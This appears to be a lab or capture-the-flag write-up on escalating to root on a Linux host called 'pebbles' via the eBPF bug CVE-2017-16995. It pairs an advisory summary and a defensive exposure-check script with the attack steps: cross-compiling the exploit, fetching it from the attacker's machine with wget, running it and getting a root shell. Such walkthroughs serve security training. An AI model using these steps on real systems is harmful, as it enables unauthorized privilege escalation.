CVE-2017-16995


PEAS has identified that the target system is vulnerable to CVE-2017-16995

A vulnerability classified as critical has been found in the Linux Kernel up to 4.14.8. Affected is the function check_alu_op in the file kernel/bpf/verifier.c (the eBPF verifier's sign-extension handling). Manipulation with an unknown input leads to memory corruption. CWE classifies the issue as CWE-119: the product performs operations on a memory buffer, but it can read from or write to a memory location that is outside the intended boundary of the buffer. The impact is on confidentiality, integrity, and availability.
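The following triage script is an added example for defenders reviewing a finding like the one above; it is not part of the original writeup and not the exploit it used. It combines two signals: whether the running kernel's major.minor.patch falls in the upstream affected range quoted above (up to 4.14.8), and whether the kernel.unprivileged_bpf_disabled sysctl is set, which blocks unprivileged users from loading eBPF programs through the affected verifier. The version threshold, the sysctl path and the sample version strings in the usage are the assumptions it rests on.

```shell
#!/bin/sh
# Added triage helper (example only, not part of the original writeup or
# the exploit it used). It reports whether a host looks exposed to
# CVE-2017-16995 using two signals:
#   1. the running kernel's major.minor.patch is <= 4.14.8, the upstream
#      affected range quoted in the advisory above;
#   2. kernel.unprivileged_bpf_disabled is not set, so an unprivileged
#      user can still load eBPF programs through the affected verifier.
# Caveat: distributions backport fixes without changing the upstream
# version string, so (1) is only a heuristic; (2) is the mitigation that
# actually closes the unprivileged path, and setting
# kernel.unprivileged_bpf_disabled=1 is the usual hardening where
# unprivileged eBPF is not needed.

# kernel_is_in_range VERSION -> exit 0 when VERSION parses to <= 4.14.8.
# Accepts distro strings such as "4.4.0-116-generic" (extra fields ignored).
kernel_is_in_range() {
    printf '%s\n' "$1" | awk -F'[.-]' '{
        n = ($1 + 0) * 1000000 + ($2 + 0) * 1000 + ($3 + 0)
        limit = 4 * 1000000 + 14 * 1000 + 8
        code = (n <= limit) ? 0 : 1
        exit code
    }'
}

# unprivileged_bpf_blocked [FILE] -> exit 0 when the sysctl reads 1 or 2.
# FILE defaults to the real /proc entry; a path argument lets it be tested.
unprivileged_bpf_blocked() {
    f=${1:-/proc/sys/kernel/unprivileged_bpf_disabled}
    [ -r "$f" ] || return 1
    v=$(cat "$f")
    [ "$v" = "1" ] || [ "$v" = "2" ]
}

# assess VERSION [FILE] -> exit 0 (and say EXPOSED) only when both signals
# point at exposure; otherwise explain which one rules it out.
assess() {
    if ! kernel_is_in_range "$1"; then
        echo "kernel $1 is above the upstream affected range (<= 4.14.8)"
        return 1
    fi
    if unprivileged_bpf_blocked "${2:-}"; then
        echo "kernel $1 is in the affected range, but unprivileged BPF is disabled"
        return 1
    fi
    echo "kernel $1 is in the affected range and unprivileged BPF is allowed: EXPOSED"
    return 0
}

# Usage: sh cve-2017-16995-check.sh "$(uname -r)"
[ "$#" -eq 0 ] || assess "$@"
```

Run it with the output of `uname -r` on the host being assessed; the exit status is 0 only when both signals indicate exposure, so it can be dropped into an inventory loop. Because the version check cannot see backported fixes, treat a "range but blocked" result as mitigated and a "range and allowed" result as something to confirm against the distribution's own advisory before closing the finding.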

Exploit


Exploit found online

www-data@pebbles:/$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
www-data@pebbles:/$ cc
The program 'cc' can be found in the following packages:
 * gcc
 * clang
 * tcc
Ask your administrator to install one of them

No compiler is available on the target, so the exploit is compiled elsewhere and the resulting binary is transferred over.

Docker Exploit Development


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name pebbles ubuntu:16.04      
root@ed4ffa517958:/# cd root; apt update -y; apt install git make nano gcc gcc-multilib -y
 
root@ed4ffa517958:~# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Setting up the environment

root@ed4ffa517958:~# nano CVE-2017-16995.c 
root@ed4ffa517958:~# gcc -O2 -Wall CVE-2017-16995.c -o CVE-2017-16995
CVE-2017-16995.c: In function 'pwn':
CVE-2017-16995.c:246:3: warning: ignoring return value of 'system', declared with attribute warn_unused_result [-Wunused-result]
   system("/bin/bash");
   ^
 
root@ed4ffa517958:~# cp CVE-2017-16995 host/

Compiling

Exploitation


www-data@pebbles:/var/tmp$ wget -q http://192.168.45.192/CVE-2017-16995; chmod 755 ./CVE-2017-16995

Delivery complete

www-data@pebbles:/var/tmp$ ./CVE-2017-16995
task_struct = ffff88003d106e00
uidptr = ffff88003430ba84
spawning root shell
root@pebbles:/var/tmp# whoami
root
root@pebbles:/var/tmp# hostname
pebbles
root@pebbles:/var/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:50:88 brd ff:ff:ff:ff:ff:ff
    inet 192.168.209.52/24 brd 192.168.209.255 scope global ens160
       valid_lft forever preferred_lft forever

System level compromise